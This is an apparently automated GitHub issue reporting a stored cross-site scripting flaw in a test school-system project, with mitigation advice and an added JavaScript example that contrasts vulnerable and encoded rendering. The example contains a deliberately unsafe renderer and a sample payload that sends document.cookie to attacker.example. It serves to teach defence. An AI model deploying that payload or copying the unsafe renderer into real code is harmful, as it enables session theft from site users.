
RGB_00003.002 - AppSec Flow: Vulnerability - (Stored XSS) Stored Cross-Site Scripting #10

Open
conviso-platform-appsec-staging bot opened this issue Oct 20, 2020 · 1 comment

Comments

@conviso-platform-appsec-staging

ID: RGB_00003.002

Category: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Reported by: Rodrigo Reginato

Project: reginato/school-system-test

Severity:

Impact: High

Probability: High

Severity: Critical

Standards: [2013] A3 – Cross-Site Scripting (XSS), CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Description: A Cross-Site Scripting (XSS) vulnerability could allow an attacker to obtain sensitive information from the web application. This flaw could permit unauthorized access by an attacker. An XSS flaw is exploited by injecting malicious code into the scope of the application; the legitimate user then executes this malicious code, sending sensitive information such as cookies back to the attacker.

Impact description: Pending completion

Solution: The first step in mitigating XSS problems is to identify all points of the application where user-supplied data is used in the construction of response pages. This identification should cover not only the points where data from a particular request is copied directly into the response page, but also any point where user-supplied data is persisted by the application to be shown later, as happens, for example, with the information submitted through a registration form.
It is recommended that the validation governing the input data flow be based on the context of the information being received; for example, numeric fields should accept strictly numeric characters, rejecting any character set different from what the application expects. The same procedure should be followed for the other form fields according to the type of information they are meant to accept: names, e-mail addresses, phone numbers, among others. This can be achieved using regular expressions that filter out unwanted character sets, chosen according to the context of the information received.
With respect to the validation applied to the application's output data flow, when the information is actually used to build the responses, you should ensure that potentially malicious characters are replaced by the escape sequences defined in HTML. A well-defined set of HTML entities should be used to replace literal characters as follows:
char " replaced by &quot;
char ' replaced by &#x27;
char & replaced by &amp;
char < replaced by &lt;
char > replaced by &gt;
To achieve a thorough filter, it is strongly recommended to HTML-encode any character outside the set of alphanumeric and whitespace characters.

References: https://www.owasp.org/index.php/XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://www.youtube.com/watch?v=Z9RQSnf8-g

Type of flaw:

**Code:** test

**Data input:** test

**Data output:** test

Defect Tracker: https://app.conviso.com.br/scopes/193/projects/2186
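The two defences the report's Solution section describes (context-based input validation on the way in, HTML entity encoding on the way out) applied to a stored-XSS pattern, as an added example that is not code from the Conviso report or from the school-system-test project. The in-memory store, the form fields, their validators and the sample submissions are all constructed for the example and are assumptions, not anything taken from the audited application.

```javascript
// Added example, not code from the Conviso report or the school-system-test
// project. A toy "student comments" page that persists submissions and renders
// them later (the stored-XSS pattern), with the two defences the report lists.

// Constructed in-memory store standing in for the application's database.
const records = [];

// Vulnerable rendering: persisted values are copied verbatim into the response.
// The attacker's comment is stored once and then executes for every later viewer.
function renderVulnerable(rows) {
  return rows
    .map(r => `<li><b>${r.name}</b> (${r.age}): ${r.comment}</li>`)
    .join('\n');
}

// Output encoding, minimal set: the five characters the report lists.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Output encoding, strict form: every code point outside alphanumerics and
// whitespace becomes a numeric entity (the report's last recommendation).
// The 'u' flag makes each match a whole code point, so astral characters
// are not split into surrogate halves.
function escapeHtmlStrict(value) {
  return String(value).replace(/[^A-Za-z0-9\s]/gu,
    c => `&#x${c.codePointAt(0).toString(16)};`);
}

// Input validation by context: an allow-list per field. The field set and the
// regexes are assumptions made for this example; a real form defines its own.
const validators = {
  age:     v => /^[0-9]{1,3}$/.test(v),
  name:    v => /^[\p{L} .'-]{1,60}$/u.test(v),       // letters, space, . ' - only
  email:   v => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(v),
  comment: v => v.length <= 500,                     // free text: no character filter,
};                                                   // output encoding must cover it

function validateInput(field, value) {
  const check = validators[field];
  return Boolean(check) && check(String(value));
}

// Submission path: reject anything that fails its field's validator, then persist.
function submit(record) {
  for (const field of ['name', 'age', 'email', 'comment']) {
    if (!validateInput(field, record[field])) return false;
  }
  records.push(record);
  return true;
}

// Hardened rendering: every persisted value is encoded at the point of output,
// including fields (like name) whose validator legitimately admits quotes.
function renderSafe(rows) {
  return rows
    .map(r => `<li><b>${escapeHtml(r.name)}</b> (${escapeHtml(r.age)}): ${escapeHtml(r.comment)}</li>`)
    .join('\n');
}

// Constructed sample submissions: one benign, one carrying a cookie-stealing payload.
const PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
submit({ name: "Ana O'Brien", age: '17', email: 'ana@example.org', comment: 'Great class!' });
submit({ name: 'Mallory', age: '18', email: 'm@example.org', comment: PAYLOAD });

console.log(renderVulnerable(records)); // the <script> tag reaches every viewer
console.log(renderSafe(records));       // the same payload is shown as inert text
```

The name field is the point worth noticing: its validator has to admit an apostrophe for legitimate names, so input validation alone cannot stop a quote-based injection there, and the output encoding step is what makes the persisted value safe to display.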

@reginato
Owner

test
